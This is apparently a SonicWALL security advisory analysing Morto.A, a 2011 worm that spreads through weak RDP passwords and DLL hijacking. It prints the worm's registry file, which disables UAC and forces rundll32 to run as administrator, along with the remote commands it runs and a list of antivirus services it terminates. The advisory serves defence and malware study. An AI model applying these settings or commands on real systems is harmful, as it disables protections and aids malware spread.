conexión remota con rundll32

Conexión remota con rundll32

SonicWALL Security Center

Back to SonicALERT

RDP Worm Morto.A (Aug. 31, 2011)

Description

SonicWALL UTM Research team received reports of a new internet worm propagating

in the wild. This worm targets Remote Desktop Protocol (RDP) and has the capability

to download additional malicious components, terminate Antivirus related security

processes and services, perform Denial-of-Service attack (DDOS) and can be remotely

controlled from a malicious server.

Process of Infection:

This worm targets machines via Remote Desktop Protocol (RDP) by compromising

weak administrator passwords. Once a system is infected, it will scan the local network

for RDP connections through port 3389. It uses a set of usernames and passwords to

gain access to these RDP machines and infects them.

Installation:

This worm has three components: Main executable, DLL loader, and the payload.

Main Executable

The main executable drops the DLL loader ntshrui.dll on %windir%/temp directory and

copies it as clb.dll on %windir% directory.

It adds the following registry entries as part of its installation:

• HKLM\SYSTEM\Wpa\it

• HKLM\SYSTEM\Wpa\id

• HKLM\SYSTEM\Wpa\ie

• HKLM\SYSTEM\Wpa\sr

• HKLM\SYSTEM\Wpa\sn

• HKLM\SYSTEM\Wpa\md

It then deletes the following registry to remove its tracks:

• HKCU "Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"

The DLL loader clb.dll located at %windir% directory is loaded once the malware

spawns the process Registry Editor (regedit.exe).

There is a legitimate DLL file clb.dll located in %windir%/system32 directory that

regedit.exe actually uses. But because of the design of how windows loads files,

wherein it will look for them at %windir% directory first before looking at

%windir%/system32, the malware component clb.dll will in effect be loaded instead of

the legitimate one.

DLL Loader

After getting loaded by the process regedit, it will decrypt the payload DLL and loads it

to memory. It will also perform the following activities:

Added Registry:

Key: HKLM\SYSTEM\CurrentControlSet\Control\Windows

Value: "NoPopUpsOnBoot"

Data: "1"

Key: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters

Value: "ServiceDll"

Data: "%windir%\temp\ ntshrui.dll"

Modified Registry:

Key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Para

meters

Value: ServiceDll

Data Before: %SystemRoot%\system32\sens.dll Data After:

%SystemRoot%\system32\sens32.dll

Added Files:

%windir%\offline web pages\{Current Date}

%windir%\offline web pages\1.40_testDdos

%windir%\offline web pages\cache.txt - blocked as [ GAV: Morto.A_2 (Trojan)

]

%windir%\system32\sens32.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]

DLL Payload

The malware attempts to connect to RDP servers on local network through port 3389

using administrator accounts. Some of the accounts are shown below:

It will copy the following files on the RDP workstations through \\tsclient\a\.

• \\tsclient\a\a.dll - blocked as [ GAV: Morto.A_2 (Trojan) ]

• \\tsclient\a\r.reg

Contents of the file r.reg is shown below which ensures rundll32.exe will run the

malware with administrator privileges and without prompting for user for permission

for any system changes:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio

n\Policies\System]

"ConsentPromptBehaviorAdmin"=dword:0

"EnableLUA"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows

NT\CuurrentVersion\AppCompatFlags\Layers]

"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"

"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"

"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"

"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"

"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"

"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"

"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"

Once files have been copied to RDP workstations, the malware will run those with the

following commands:

• "regedit /s \\tsclient\a\r.reg"

• "rundll32 \\tsclient\a\a.dll a"

It also terminates the following services related to AV security softwares:

• 360rp

• a2service

• ACAAS

• ArcaConfSV

• AvastSvc

• avguard

• avgwdsvc

• avp

• avpmapp

• ccSvcHst

• cmdagent

• coreService

• FortiScand

• FPAVServer

• freshclam

• fsdfwd

• GDFwSvc

• K7RTScan

• knsdave

• KVSrvXP

• kxescore

• mcshield

• MPSvc

• MsMpEng

• NSESVC.EXE

• PavFnSvr

• RavMonD

• SavService

• scanwscs

• Shell

• SpySweeper

• Vba32Ldr

• vsserv

• zhudongfangyu

Network Activities:

The malware tries to contact the following URLs:

• qf{REMOVED}.net

• ms.ji{REMOVED}nfo

• ms.ji{REMOVED}o.cc

• ms.ji{REMOVED}o.be

SonicWALL Gateway AntiVirus provides protection against this worm via the

following signatures:

GAV: Morto.A (Worm)

GAV: Morto.A_2 (Trojan)